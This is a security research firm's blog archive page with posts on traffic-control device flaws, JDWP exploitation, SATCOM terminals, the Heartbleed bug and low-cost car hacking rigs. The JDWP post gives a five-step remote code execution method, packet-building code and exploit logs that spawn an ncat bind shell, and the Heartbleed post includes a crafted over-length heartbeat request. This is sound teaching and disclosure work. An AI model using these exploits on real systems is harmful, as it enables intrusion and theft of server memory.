INSIGHTS | April 30, 2014

Hacking US (and UK, Australia, France, etc.) Traffic Control Systems

Many of you have probably watched the scenes in “Live Free or Die Hard” (Die Hard 4) where “terrorist hackers” manipulate traffic signals just by hitting Enter or typing a few keys. I wanted to do that! I started to look around, and while I couldn’t do exactly the same thing (too Hollywood style!), I got pretty close. I found some interesting devices used by traffic control systems in important US cities, and I could hack them 🙂 These devices are also used in cities in the UK, France, Australia, China, etc., making them even more interesting.
After getting the devices, it wasn’t difficult to find vulnerabilities (actually, it was more difficult to make them work properly, but that’s another story).

The vulnerabilities I found allow anyone to take complete control of the devices and send fake data to traffic control systems. Basically anyone could cause a traffic mess by launching an attack with a simple exploit programmed on cheap hardware ($100 or less).
I even tested the attack launched from a drone flying at over 650 feet, and it worked! Theoretically, an attack could be launched from 1 or 2 miles away with a better drone and better hardware; I just used a common, commercially available drone and cheap hardware. Since it seems flying a drone in the US is not illegal and anyone will be able to get drones on demand soon, I would be worried about attacks from the sky.
It might also be possible to create self-replicating malware (worm) that can infect these vulnerable devices in order to launch attacks affecting traffic control systems later. The exploited device could then be used to compromise all of the same devices nearby.
 
What worries me the most is that if a vulnerable device is compromised, it’s really, really difficult and really, really costly to detect it. So there could already be compromised devices out there that no one knows about or could know about. 
 
Let me give you an idea of how widespread the vulnerable deployments are. The following comes from the vulnerable vendors’ own documentation:
  • 250+ customers in 45 US states and 10 countries
  • Important US cities have deployments: New York, Washington DC, San Francisco, Los Angeles, Boston, Seattle, etc.
  • 50,000+ devices deployed worldwide (most of them in the US)
  • Countries include US, United Kingdom, China, Canada, Australia, France, etc. For instance, some UK cities with deployments: London, Shropshire, Slough, Bournemouth, Aberdeen, Blackburn with Darwen Borough Council, Belfast, etc. 
  • Australia has a big deployment on one of the most important and modern freeways.


As you can see, there are 50,000+ devices out there that could be hacked and cause traffic messes in many important cities.

Going onsite
I knew that the devices I have are vulnerable, but I wanted to be 100% sure that I wasn’t missing anything with my tests. Real-life deployments could have different configurations (different hardware/software versions), and it seemed that the vendor provided wrong information when I reported the vulnerabilities, so maybe what I found didn’t affect real-life deployments. I put my “tools” in my backpack and went to Seattle, New York, and Washington DC to do some “passive” onsite tests (“no hacking and nothing illegal” :)). Luckily, I could confirm that what I found applied to real-life deployments. BTW, many thanks to Ian Amit for the pictures and videos and for daring to go with me to DC :).

Vulnerabilities
As you may have already realized, I’m not going to share specific technical details here (for that, you will have to wait and go to Infiltrate 2014 in a couple of weeks). What I would like to mention is that the vendor was contacted a long time ago (September 2013) through ICS-CERT (the initial report to ICS-CERT was sent on July 31st, 2013). I was told by ICS-CERT that the vendor said that they didn’t think the issues were critical or even important. For instance, regarding one of the vulnerabilities, the vendor said that since the devices were designed that way (insecure) on purpose, they were working as designed, and that customers (state/city governments) wanted the devices to work that way (insecure), so there wasn’t any security issue. Yes, that was the answer. I couldn’t believe it. 
 
Regarding another vulnerability, the vendor said that it’s already fixed in newer versions of the device. But there is a big problem: you need to get a new device and replace the old one. This is not good news for state/city governments, since thousands of devices are already out there, and the time and money it would take to replace all of them is considerable. Meanwhile, the existing devices remain vulnerable and open to attack.
 
Another excuse the vendor provided is that because the devices don’t control traffic lights, there is no need for security. This is crazy, because while the devices don’t directly control traffic control systems, they have a direct influence on the actions and decisions of these systems.
I tried several times to make ICS-CERT and the vendor understand that these issues were serious, but I couldn’t convince them. In the end I said, if the vendor doesn’t think they are vulnerable then OK, I’m done with this; I have tried hard, and I don’t want to continue wasting time and effort. Also, since DHS is aware of this (through ICS-CERT), and it seems that this is not critical nor important to them, then there isn’t anything else I can do except to go public.
 
This should be another wake-up call for governments to evaluate the security of devices/products before using them in critical infrastructure, and also a request to providers of government devices/products to take security and security vulnerability reports seriously.
 
Impact
 
By exploiting the vulnerabilities I found, an attacker could cause traffic jams and problems at intersections, freeways, highways, etc. 
It’s possible to make traffic lights (depending on the configuration) stay green for more or less time, stay red and not change to green (I bet many of you have experienced something like this as a result of driving during non-traffic hours late at night or being on a bike or in a small car), or flash. It’s also possible to cause electronic signs to display incorrect speed limits and instructions, and to make ramp meters allow cars onto the freeway faster or slower than needed. 
 
These traffic problems could cause real issues, even deadly ones, by causing accidents or blocking ambulances, fire fighters, or police cars going to an emergency call.
I’m sure there are manual overrides and secondary controls in place that can be used if anomalies are detected and could mitigate possible attacks, and some traffic control systems won’t depend only on these vulnerable devices. This doesn’t mean that attacks are impossible or really complex; the possibility of a real attack shouldn’t be disregarded, since launching an attack is simple. The only thing that could be complex is making an attack have a bigger impact, but complex doesn’t mean impossible.
 

Traffic departments in states/cities with vulnerable devices deployed should pay special attention to traffic anomalies when there is no apparent reason and closely watch the device’s behavior.
 
“In 2012, there were an estimated 5,615,000 police-reported traffic crashes in which 33,561 people were killed and 2,362,000 people were injured; 3,950,000 crashes resulted in property damage only.” US DoT National Highway Traffic Safety Administration: Traffic Safety Facts
 
“Road crashes cost the U.S. $230.6 billion per year, or an average of $820 per person” Association for Safe International Road Travel: Annual US Road Crash Statistics
 
If you add malfunctioning traffic control systems to the above stats, the numbers could be a lot worse.
INSIGHTS | April 23, 2014

Hacking the Java Debug Wire Protocol – or – “How I met your Java debugger”

By Christophe Alladoum – @_hugsy_
 
TL;DR: turn any open JDWP service into reliable remote code execution (exploit inside)
 
<plagiarism> Kids, I’m gonna tell you an incredible story. </plagiarism>
This is the story of how I came across an interesting protocol during a recent code review engagement for IOActive and turned it into a reliable way to execute remote code. In this post, I will explain the Java Debug Wire Protocol (JDWP) and why it is interesting from a penetration tester’s point of view. I will cover some JDWP internals and how to use them to perform code execution, resulting in a reliable and universal exploitation script. So let’s get started.
 
Disclaimer: This post provides techniques and exploitation code that should not be used against vulnerable environments without prior authorization. The author cannot be held responsible for any private use of the tool or techniques described therein.
 
Note: As I was looking into JDWP, I stumbled upon two brief posts on the same topic (see [5] (in French) and [6]). They are worth reading, but do not expect them to provide a deep understanding of the protocol itself or a reliable way to exploit it. This post does not reveal any 0-day exploits, but instead thoroughly covers JDWP from a pentester/attacker perspective. 

Java Debug Wire Protocol

Java Platform Debug Architecture (JPDA)
JDWP is one component of the global Java debugging system, called the Java Platform Debug Architecture (JPDA). The following is a diagram of the overall architecture:
 

 

 
The Debuggee consists of a multi-threaded JVM running our target application. In order to be remotely debuggable, the JVM instance must be explicitly started with the option -Xdebug passed on the command line, as well as the option -Xrunjdwp (or -agentlib). For example, starting a Tomcat server with remote debugging enabled would look like this:
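A typical invocation would be along these lines (a sketch; port 8000 and the application jar are placeholders, the port simply matching the capture shown later):

java -Xdebug -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8000 -jar someapp.jar

Tomcat exposes the same options through its launcher script, so an equivalent setup is:

JPDA_ADDRESS=8000 JPDA_TRANSPORT=dt_socket ./bin/catalina.sh jpda start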
 

 

As shown in the architecture diagram, the Java Debug Wire Protocol is the central link between the Debugger and the JVM instance. Observations about the protocol include:
  • It is a packet-based network binary protocol.
  • It is mostly synchronous. The debugger sends a command over JDWP and expects to receive a reply. However, some commands, like Events, do not expect a synchronous response. They will send a reply when specific conditions are met. For example, a BreakPoint is an Event.
  • It does not use authentication.
  • It does not use encryption.
 
All of these observations make total sense since we are talking about a debugging protocol. However, when such a service is exposed to a hostile network, or is Internet facing, things could go wrong.


Handshake
JDWP dictates[9] that communication must be initiated by a simple handshake. Upon successful TCP connection, the Debugger (client) sends the 14-character ASCII string “JDWP-Handshake”. 
The Debuggee (server) responds to this message by sending the exact same string. 
 
The following scapy[3] trace shows the initial two-way handshake:

 

root:~/tools/scapy-hg # ip addr show dev eth0 | grep "inet "
    inet 192.168.2.2/24 brd 192.168.2.255 scope global eth0
root:~/tools/scapy-hg # ./run_scapy
Welcome to Scapy (2.2.0-dev)
>>> sniff(filter="tcp port 8000 and host 192.168.2.9", count=8)
<Sniffed: TCP:9 UDP:1 ICMP:0 Other:0>
>>> tcp.hexraw()
0000 15:49:30.397814 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 S
0001 15:49:30.402445 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 SA
0002 15:49:30.402508 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 A
0003 15:49:30.402601 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 PA / Raw
0000   4A 44 57 50 2D 48 61 6E  64 73 68 61 6B 65         JDWP-Handshake

0004 15:49:30.407553 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 A
0005 15:49:30.407557 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 A
0006 15:49:30.407557 Ether / IP / TCP 192.168.2.9:8000 > 192.168.2.2:59079 PA / Raw
0000   4A 44 57 50 2D 48 61 6E  64 73 68 61 6B 65         JDWP-Handshake
0007 15:49:30.407636 Ether / IP / TCP 192.168.2.2:59079 > 192.168.2.9:8000 A

An experienced security auditor may have already realised that such a simple handshake offers a way to easily uncover live JDWP services on the Internet. Just send one simple probe and check for the specific response. 
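A minimal probe needs only a few lines of Python (a sketch; the host, port, and timeout below are arbitrary examples):

#!/usr/bin/env python2
# Minimal JDWP discovery probe: connect, send the handshake string,
# and check whether the service echoes the exact same 14 bytes back.
import socket

HANDSHAKE = "JDWP-Handshake"

def is_jdwp(host, port, timeout=3):
    s = socket.create_connection((host, port), timeout=timeout)
    try:
        s.sendall(HANDSHAKE)
        return s.recv(len(HANDSHAKE)) == HANDSHAKE
    finally:
        s.close()

if __name__ == "__main__":
    print is_jdwp("192.168.2.9", 8000)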

 
More interestingly, when scanning with ShodanHQ, a peculiar behavior was observed with the IBM Java Development Kit: the server “talks” first, sending the very same banner mentioned above. As a consequence, there is a totally passive way to discover an active JDWP service (this is covered later in this article with the help of the (in)famous Shodan).


Communication
JDWP defines messages[10] involved in communications between the Debugger and the Debuggee. 
 
The messages follow a simple structure, defined as follows:
 

 

The Length and Id fields are rather self-explanatory. The Flag field is only used to distinguish request packets from replies, with a value of 0x80 indicating a reply packet. The CommandSet field defines the category of the Command, as shown in the following table. 

CommandSet      Command
0x00–0x3F       Action to be taken by the JVM (e.g. setting a BreakPoint)
0x40–0x7F       Provide event information to the debugger (e.g. the JVM has hit a BreakPoint and is waiting for further actions)
0x80–0xFF       Third-party extensions
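
To make the layout concrete, here is a sketch in Python 2 of how a command packet can be built by hand. The header is 11 bytes: a 4-byte Length (which includes the header itself), a 4-byte Id, a 1-byte Flag, a 1-byte CommandSet, and a 1-byte Command; VirtualMachine/IDSizes (command set 1, command 7) is used as the example because it carries no data:

import struct

def jdwp_command(pkt_id, cmd_set, cmd, data=""):
    # Command packet header: Length, Id, Flags (0x00 for a request),
    # CommandSet and Command. Replies carry flag 0x80 and a 2-byte
    # error code in place of the CommandSet/Command pair.
    length = 11 + len(data)
    return struct.pack(">IIBBB", length, pkt_id, 0x00, cmd_set, cmd) + data

# VirtualMachine/IDSizes: command set 1, command 7, no payload.
idsizes_packet = jdwp_command(0x01, 1, 7)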
 
Keeping in mind that we want to execute arbitrary code, the following commands are the most interesting for our purposes.
  • VirtualMachine/IDSizes defines the size of the data structures handled by the JVM. This is one of the reasons why the nmap script jdwp-exec.nse[11] does not work, since the script uses hardcoded sizes.
  • ClassType/InvokeMethod allows you to invoke a static function.
  • ObjectReference/InvokeMethod allows you to invoke a function from an instantiated object in the JVM.
  • StackFrame/(Get|Set)Values provides pushing/popping capabilities for a thread’s stack.
  • Event/Composite forces the JVM to react to specific behaviors declared by this command. This command is a major key for debugging purposes as it allows, among many other things, setting breakpoints, single-stepping through the threads during runtime, and being notified when accessing/modifying values in the exact same manner as GDB or WinDBG.
 
Not only does JDWP allow you to access and invoke objects already residing in memory, it also allows you to create or overwrite data.
  • VirtualMachine/CreateString allows you to transform a string into a java.lang.String living in the JVM runtime.
  • VirtualMachine/RedefineClasses allows you to install new class definitions.
 
“All your JDWP are belong to us”
As we have seen, JDWP provides built-in commands to load arbitrary classes into the JVM memory and invoke already existing and/or newly loaded bytecode. The following section will cover the steps for creating exploitation code in Python, which behaves as a partial implementation of a JDI front end in order to be as reliable as possible. The main reason for this standalone exploit script is that, as a pentester, I like “head-shot” exploits. That is, when I know for sure an environment/application/protocol is vulnerable, I want to have my tool ready to exploit it right away (i.e. no PoC, which is basically the only thing that existed so far). So now that we have covered the theory, let’s get into the practical implementation.
 
When faced with an open JDWP service, arbitrary command execution is exactly five steps away (or with this exploit, only one command line away). Here is how it would go down:
 
1. Fetch Java Runtime reference
The JVM manipulates objects through their references. For this reason, our exploit must first obtain the reference to the java.lang.Runtime class. From this class, we need the reference to the getRuntime() method. This is performed by fetching all classes (AllClasses packet) and all methods in the class we are looking for (ReferenceType/Methods packet).
 
2. Setup breakpoint and wait for notification (asynchronous calls)
This is the key to our exploit. To invoke arbitrary code, we need to be in a running thread context. To do so, a hack is to set up a breakpoint on a method that is known to be called at runtime. As seen earlier, a breakpoint in JDI is an asynchronous event whose type is set to BREAKPOINT (0x02). When hit, the JVM sends an EventData packet to our debugger, containing our breakpoint ID and, more importantly, the reference to the thread that hit it.

 

It is therefore a good idea to set it on a frequently called method, such as java.net.ServerSocket.accept(), which is very likely to be called every time the server receives a new network connection. However, one must bear in mind that it could be any method existing at runtime.
 
3. Allocate a Java String object in the runtime to carry the payload
We will execute code in the JVM runtime, so all of our manipulated data (such as strings) must exist in the JVM runtime (i.e. possess a runtime reference). This is done quite easily by sending a CreateString command.
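As a sketch of what that looks like on the wire (reusing the jdwp_command() helper from the earlier sketch; per the JDWP specification, CreateString is command 11 of the VirtualMachine command set, and the string data is prefixed with its 4-byte length):

import struct

def create_string_packet(pkt_id, payload):
    # VirtualMachine/CreateString: command set 1, command 11.
    data = struct.pack(">I", len(payload)) + payload
    return jdwp_command(pkt_id, 1, 11, data)

# The reply holds the objectID of the freshly created java.lang.String.
pkt = create_string_packet(0x02, "ncat -l -p 1337 -e /bin/bash")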
 

 

 
4. Get Runtime object from breakpoint context
At this point we have almost all of the elements we need for a successful, reliable exploitation. What we are missing is a Runtime object reference. Obtaining it is easy, and we can simply execute in the JVM runtime the java.lang.Runtime.getRuntime() static method[8] by sending a ClassType/InvokeMethod packet and providing the Runtime class and thread references.
 
5. Lookup and invoke exec() method in Runtime instance
The final step is simply looking for the exec() method in the Runtime object obtained in the previous step and invoking it (by sending an ObjectReference/InvokeMethod packet) with the String object we created in step three. 
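
Chained together, the whole attack is conceptually this small (every helper name below is hypothetical pseudo-Python; the actual jdwp-shellifier.py is organized differently):

# Hypothetical outline of the five steps described above.
runtime_cls = get_class_by_signature("Ljava/lang/Runtime;")        # step 1: AllClasses
get_runtime = get_method_id(runtime_cls, "getRuntime")             #         ReferenceType/Methods
thread_id   = wait_for_breakpoint("java.net.ServerSocket.accept")  # step 2: Event/Composite
cmd_string  = create_string("ncat -l -p 1337 -e /bin/bash")        # step 3: VirtualMachine/CreateString
runtime_obj = invoke_static(runtime_cls, get_runtime, thread_id)   # step 4: ClassType/InvokeMethod
exec_method = get_method_id(runtime_cls, "exec")
invoke_instance(runtime_obj, exec_method, thread_id, cmd_string)   # step 5: ObjectReference/InvokeMethod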
 
Et voilà !! Swift and easy.
 
As a demonstration, let’s start a Tomcat running with JPDA “debug mode” enabled:
root@pwnbox:~/apache-tomcat-6.0.39# ./bin/catalina.sh jpda start
 
We execute our script without a command to execute, to simply get general system information:
hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.9 
[+] Targeting '192.168.2.9:8000'
[+] Reading settings for 'Java HotSpot(TM) 64-Bit Server VM - 1.6.0_65'
[+] Found Runtime class: id=466
[+] Found Runtime.getRuntime(): id=7facdb6a8038
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
## Here we wait for breakpoint to be triggered by a new connection ##
[+] Received matching event from thread 0x8b0
[+] Found Operating System 'Mac OS X'
[+] Found User name 'pentestosx'
[+] Found ClassPath '/Users/pentestosx/Desktop/apache-tomcat-6.0.39/bin/bootstrap.jar'
[+] Found User home directory '/Users/pentestosx'
[!] Command successfully executed


Same command line, but against a Windows system and breaking on a totally different method:

hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 --break-on 'java.lang.String.indexOf'
[+] Targeting '192.168.2.8:8000'
[+] Reading settings for 'Java HotSpot(TM) Client VM - 1.7.0_51'
[+] Found Runtime class: id=593
[+] Found Runtime.getRuntime(): id=17977a9c
[+] Created break event id=2
[+] Waiting for an event on 'java.lang.String.indexOf'
[+] Received matching event from thread 0x8f5
[+] Found Operating System 'Windows 7'
[+] Found User name 'hugsy'
[+] Found ClassPath 'C:\Users\hugsy\Desktop\apache-tomcat-6.0.39\bin\bootstrap.jar'
[+] Found User home directory 'C:\Users\hugsy'
[!] Command successfully executed


We execute our exploit to spawn a bind shell with the payload “ncat -e /bin/bash -l -p 1337”, against a Linux system:

hugsy:~/labs % python2 jdwp-shellifier.py -t 192.168.2.8 --cmd 'ncat -l -p 1337 -e /bin/bash'
[+] Targeting '192.168.2.8:8000'
[+] Reading settings for 'OpenJDK Client VM - 1.6.0_27'
[+] Found Runtime class: id=79d
[+] Found Runtime.getRuntime(): id=8a1f5e0
[+] Created break event id=2
[+] Waiting for an event on 'java.net.ServerSocket.accept'
[+] Received matching event from thread 0x82a
[+] Selected payload 'ncat -l -p 1337 -e /bin/bash'
[+] Command string object created id:82b
[+] Runtime.getRuntime() returned context id:0x82c
[+] found Runtime.exec(): id=8a1f5fc
[+] Runtime.exec() successful, retId=82d
[!] Command successfully executed
 
Success, we now have a listening socket!
root@pwnbox:~/apache-tomcat-6.0.39# netstat -ntpl | grep 1337
tcp        0      0 0.0.0.0:1337         0.0.0.0:*               LISTEN      19242/ncat      
tcp6       0      0 :::1337              :::*                    LISTEN      19242/ncat     


Same win on MacOSX:
pentests-Mac:~ pentestosx$ lsof | grep LISTEN
ncat      4380 pentestosx    4u    IPv4 0xffffff800c8faa40       0t0        TCP *:menandmice-dns (LISTEN)
 
A link to the full exploitation script is provided here[1]. 
 
The final exploit uses those techniques, adds a few checks, and sends suspend/resume signals to cause as little disruption as possible (it’s always best not to break the application you’re working on, right?). It acts in two modes: 
  • “Default” mode is totally non-intrusive and simply executes Java code to get local system information (perfect for a PoC to show a client).
  • Passing the “cmd” option executes a system command on the remote host and is therefore more intrusive. The command runs with the privileges the JVM is running with.
 
This exploit script was successfully tested against:
  • Oracle Java JDK 1.6 and 1.7
  • OpenJDK 1.6
  • IBM JDK 1.6
 
As Java is platform-independent by design, commands can be executed on any operating system that Java supports.
 
Well, this is actually good news for us pentesters: an open JDWP service means reliable RCE.
 
So far, so good.


What about real-life exploitation?

As a matter of fact, JDWP is used quite a lot in the Java application world. Pentesters might, however, not see it that often when performing remote assessments as firewalls would (and should) mostly block the port it is running on.
 
But this does not mean that JDWP cannot be found in the wild:
  • At the time of writing this article, a quick search on ShodanHQ[4] immediately reveals about 40 servers sending the JDWP handshake:

 

This is actually an interesting finding because, as we’ve seen before, it is supposed to be the client side (the debugger) that initiates the dialogue.
  • GitHub[7] also reveals a significant number of potentially vulnerable open-source applications:

 

  • masscan-ing the Internet looking for specific ports (tcp/8000, tcp/8080, tcp/8787, tcp/5005) revealed many hosts (which cannot be reported here) responding to the initial handshake.
  • “Enterprise” applications were found in the wild running a JDWP service *by default* (finding the actual port number is left as an exercise to the curious reader).
 
These are just a few ways to discover open JDWP services on the Internet. This is a great reminder that applications should regularly undergo thorough security reviews, production environments should have any debugging functionality turned off, and firewalls should be configured to restrict access to services required for normal operation only. Allowing anybody to connect to a JDWP service is exactly the same as allowing a connection to a gdbserver service (in what may be a more stable way).
 
I hope you enjoyed reading this article as much as I enjoyed playing with JDWP. 
 
To y’all mighty pirates, happy JDWP pwning !!


Thanks

I would like to thank Ilja Van Sprundel and Sebastien Macke for their ideas and tests.


References:
  1. https://github.com/IOActive/jdwp-shellifier
  2. http://docs.oracle.com/javase/7/docs/technotes/guides/jpda/architecture.html
  3. http://www.secdev.org/projects/scapy (no longer active)
  4. http://www.shodanhq.com/search?q=JDWP-HANDSHAKE 
  5. http://www.hsc-news.com/archives/2013/000109.html (no longer active) 
  6. http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt 
  7. https://github.com/search?q=-Xdebug+-Xrunjdwp&type=Code&ref=searchresults
  8. http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html
  9. http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html
  10. http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html
  11. http://nmap.org/nsedoc/scripts/jdwp-exec.html
RESEARCH | April 17, 2014

A Wake-up Call for SATCOM Security

During the last few months we have witnessed a series of events that will probably be seen as a tipping point in the public’s opinion about the importance of, and need for, security. The revelations of Edward Snowden have served to confirm some theories and shed light on surveillance technologies that were long restricted.
 
We live in a world where an ever-increasing stream of digital data is flowing between continents. It is clear that those who control communications traffic have an upper-hand.
 
Satellite Communications (SATCOM) plays a vital role in the global telecommunications system. Sectors that commonly rely on satellite networks include:
  • Aerospace
  • Maritime
  • Military and governments
  • Emergency services
  • Industrial (oil rigs, gas, electricity)
  • Media
It is important to mention that certain international safety regulations for ships such as GMDSS or aircraft’s ACARS rely on satellite communication links. In fact, we recently read how, thanks to the SATCOM equipment on board Malaysian Airlines MH370, Inmarsat engineers were able to determine the approximate position of where the plane crashed. 
 
IOActive is committed to improving overall security. The only way to do so is to analyze the security posture of the entire supply chain, from the silicon level to the upper layers of software. 
 
Thus, in the last quarter of 2013 I decided to research a series of devices that, although widely deployed, had not received the attention they actually deserve. The goal was to provide an initial evaluation of the security posture of the most widely deployed Inmarsat and Iridium SATCOM terminals.  
 
In previous blog posts I’ve explained the common approach when researching complex devices that are not physically accessible. In these terms, this research is not much different from the previous ones: in most cases the analysis was performed by statically reverse engineering the firmware.

 
What about the results? 
 
Insecure and undocumented protocols, backdoors, hard-coded credentials…mainly design flaws that allow remote attackers to fully compromise the affected devices using multiple attack vectors.
 
Ships, aircraft, military personnel, emergency services, media services, and industrial facilities (oil rigs, gas pipelines, water treatment plants, wind turbines, substations, etc.) could all be affected by these vulnerabilities.
 
I hope this research is seen as a wake-up call for both the vendors and users of the current generation of SATCOM technology. We will be releasing full technical details in several months, at Las Vegas, so stay tuned.
The following white paper comprehensively explains all aspects of this research: IOActive_SATCOM_Security_WhitePaper
INSIGHTS | April 10, 2014

Bleeding Hearts

The Internet is ablaze with talk of the “heartbleed” OpenSSL vulnerability disclosed yesterday (April 7, 2014) here: https://www.openssl.org/news/secadv_20140407.txt
 
While the bug itself is a simple “missing bounds check,” it affects quite a number of high-volume, big business websites.
 
Make no mistake, this bug is BAD. It’s sort of a perfect storm: the bug is in a library used to encrypt sensitive data (OpenSSL), and it allows attackers a peek into a server’s memory, potentially revealing that same sensitive data in the clear.
 
Initially, it was reported that private keys could be disclosed via this bug, basically allowing attackers to decrypt captured SSL sessions. But as more people start looking at different sites, other issues have been revealed – servers are leaking information ranging from user sessions (https://www.mattslifebytes.com/?p=533) to encrypted search queries (duckduckgo) and passwords (https://twitter.com/markloman/status/453502888447586304). The type of information accessible to an attacker is entirely a function of what happens to be in the target server’s memory at the time the attacker sends the request.
 
While there’s a lot of talk about the bug and its consequences, I haven’t seen much about what actually causes it. Given that the bug itself is pretty easy to understand (and even spot!), I thought it would be worthwhile to walk through the vulnerability here for those of you who are curious about the why, and not just the how-to-fix.
 
 
The Bug
 
The vulnerable code is found in OpenSSL’s TLS Heartbeat Message handling routine – hence the clever “heartbleed” nickname. The TLS Heartbeat protocol is defined in RFC 6520 – “Transport Layer Security (TLS) and Datagram Transport Layer Security (DTLS) Heartbeat Extension”.  
 
Before we get into the OpenSSL code, we should examine what this protocol looks like.
 
The structure of the Heartbeat message is very simple, consisting of an 8-bit message type, a 16-bit payload length field, the payload itself, and finally a sequence of padding bytes. In pseudo-code, the message definition looks like this (copied from the RFC):
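
struct {
   HeartbeatMessageType type;
   uint16 payload_length;
   opaque payload[HeartbeatMessage.payload_length];
   opaque padding[padding_length];
} HeartbeatMessage;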
 
 
The type (line 2) is simply 1 or 2, depending on whether the message is a request or a response.
 
The payload_length (line 3) indicates the size of the payload part of the message, which follows immediately. Being a 16-bit unsigned integer, its maximum value is 2^16-1 (which is 65535). If you’ve done some other reading about this bug, you’ll recognize the 64k as being the upper limit on how much data can be accessed by an attacker per attack sent.
 
The payload (line 4) is defined to be “arbitrary content” of length payload_length.
 
And padding (line 5) is “random content” at least 16 bytes long, and “MUST be ignored.”
 
Easy enough!
 
Now I think it should be noted here that the RFC itself appears sound – it describes appropriate behavior for what an implementation of the protocol should and shouldn’t do. In fact, the RFC explicitly states that “If the payload_length of a received HeartbeatMessage is too large, the received HeartbeatMessage MUST be discarded silently.” Granted, “too large” isn’t defined, but I digress…
 
There is one last part of the RFC that’s important for understanding this bug: The RFC states that “When a HeartbeatRequest message is received … the receiver MUST send a corresponding HeartbeatResponse message carrying an exact copy of the payload of the received HeartbeatRequest.” This is important in understanding WHY vulnerable versions of OpenSSL are sending out seemingly arbitrary blocks of memory.
 
Now, on to OpenSSL code!  
 
Here’s a snippet from the DTLS Heartbeat handling function in (the vulnerable) openssl-1.0.1f/ssl/d1_both.c:
 
 
If you’re not familiar with reading C, this can be a lot to digest. The bug will become clearer if we go through this function piece by piece. We’ll start at the top…
 
 
 
This part just defines local variables for the function. The most important one here is the char pointer p (line 1457), which points to the heartbeat message the attacker controls. hbtype (line 1458) will hold the HeartbeatMessageType value mentioned in the RFC, and payload (line 1459) will hold the payload_length value. Don’t let the fact that the payload_length value is being stored in the payload variable confuse you!
 
 
 
Here, the first byte of the message is copied into the hbtype variable (line 1463), and the 16-bit payload-length is copied from p (the attacker-controlled message) to the payload variable using the n2s function (line 1464). The n2s function simply converts the value from the sequence of bits in the message to a number the program can use in calculations. Finally, the pl pointer is set to point to the payload section of the attacker-controlled message (line 1465).
 
 
On line 1474, a variable called buffer is defined and then, on line 1481, allocated an area of memory, using the attacker-controlled payload variable to calculate how much memory should be allocated. Then, on line 1482, the bp pointer is set to point to the buffer that was just allocated for the server’s response.
As an aside, if the payload_length field which gets stored in the payload variable were greater than 16-bits (say, 32 or 64-bits instead), we’d be looking at another couple of vulnerabilities: either an integer overflow leading to a buffer overflow, or potentially a null-pointer dereference. The exact nature and exploitability of either of these would depend upon the platform itself, and the exact implementation of OPENSSL_malloc. Payload_length *is* only 16-bits however, so we’ll continue…
 
 
This code snippet shows the server building the response. It’s here that this bug changes from being an attacker-controlled length field leading to Not Very Much into a serious information disclosure bug causing a big stir. Line 1485 simply sets the type of the response message pointed to by bp to be a Heartbeat Response. According to the RFC, the payload_length should be next, and indeed – it is being copied over to the bp response buffer via the s2n function on line 1486. The server is just copying the value the attacker supplied, which was stored in the payload variable. Finally, the payload section of the attacker message (pointed to by pl, on line 1465) is copied over to the response buffer, pointed to by the bp variable (again, according to the RFC specification), which is then sent back to the attacker.  
 
And herein lies the vulnerability – the attacker-controlled payload variable (which stores the payload_length field!) is used to determine exactly how many bytes of memory should be copied into the response buffer, WITHOUT first being checked to ensure that the payload_length supplied by the attacker is not bigger than the size of the attacker-supplied payload itself.
 
This means that if an attacker sends a payload_length greater than the size of the payload, any data located in the server’s memory after the attacker’s payload would be copied into the response. If the attacker set the payload_length to 10,000 bytes and only provided a payload of 10 bytes, then a little less than an extra 10,000 bytes of server memory would be copied over to the response buffer and sent back to the attacker. Any sensitive information that happened to be hanging around in the process (including private keys, unencrypted messages, etc.) is fair game. The only variable is what happens to be in memory. In playing with some of the published PoCs against my own little test server (openssl s_server FTW), I got a whole lot of nothing back, in spite of targeting a vulnerable version, because the process wasn’t doing anything other than accepting requests. To reiterate, the data accessed entirely depends on what’s in memory at the time of the attack.
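
To make that concrete, here is a rough Python 2 sketch of the malicious HeartbeatMessage itself (only the message; the surrounding TLS record and handshake, which the published PoCs handle, are omitted). The claimed length of 0x4000 is an arbitrary example; anything larger than the real payload will do:

import struct

# HeartbeatMessage: 1-byte type, 2-byte payload_length, payload, padding.
# Type 0x01 = heartbeat_request. We claim 16384 bytes of payload but only
# send 10, so a vulnerable server copies ~16 KB of its memory into the reply.
claimed_length = 0x4000
real_payload   = "A" * 10
padding        = "P" * 16
evil_heartbeat = struct.pack(">BH", 0x01, claimed_length) + real_payload + padding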
 
 
Testing it yourself
 
There are a number of PoCs put up yesterday and today that allow you to check your own servers. If you’re comfortable using an external service, you can check out http://filippo.io/Heartbleed/. Or you can grab filippo’s golang code from https://github.com/FiloSottile/Heartbleed, compile it yourself, and test on your own. If golang is not your cup of tea, I’d check out the simple Python version here: https://gist.github.com/takeshixx/10107280. All that’s required is a Python2 installation.
 
Happy Hunting!
INSIGHTS | April 8, 2014

Car Hacking 2: The Content

Does everyone remember when those two handsome young gentlemen controlled automobiles with CAN message injection (https://www.youtube.com/watch?v=oqe6S6m73Zw)? I sure do. However, what if you don’t have the resources to purchase a car, pay for insurance and repairs, and so on? 
 
Fear not Internet! 
 
Chris and Charlie to the rescue. Last week we presented our new automotive research at Syscan 2014. To make a long story short, we provided the blueprints to set up a small automotive network outside the vehicle so security researchers could start investigating Autosec (TM pending) without requiring the large budget needed to procure a real automobile. (Update: Andy Greenberg just released an article explaining our work, http://www.forbes.com/sites/andygreenberg/2014/04/08/darpa-funded-researchers-help-you-learn-to-hack-a-car-for-a-tenth-the-price/)
 
 
Additionally, we provided a solution for a mobile testing platform (a go-cart) that can be fashioned with ECUs from a vehicle (or purchased on Ebay) for testing that requires locomotion, such as assisted braking and lane departure systems. 
 
 
For those of you that want the gritty technical details, download this paper. As always, we’d love feedback and welcome any questions. 
 

 

INSIGHTS | March 26, 2014

A Bigger Stick To Reduce Data Breaches

